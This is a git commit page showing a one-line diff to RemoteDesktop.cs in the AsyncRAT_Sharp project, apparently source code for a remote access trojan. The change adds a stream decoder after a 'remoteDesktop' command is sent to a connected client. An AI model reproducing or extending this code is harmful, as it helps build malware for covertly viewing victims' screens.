Update RemoteDesktop.cs
This commit is contained in:
parent
56501ac691
commit
8352f23389
@ -47,6 +47,7 @@ namespace AsyncRAT_Sharp.Forms
|
|||||||
msgpack.ForcePathObject("Packet").AsString = "remoteDesktop";
|
msgpack.ForcePathObject("Packet").AsString = "remoteDesktop";
|
||||||
msgpack.ForcePathObject("Option").AsString = "true";
|
msgpack.ForcePathObject("Option").AsString = "true";
|
||||||
C.BeginSend(msgpack.Encode2Bytes());
|
C.BeginSend(msgpack.Encode2Bytes());
|
||||||
|
decoder = new UnsafeStreamCodec(80);
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
|
Loading…
x
Reference in New Issue
Block a user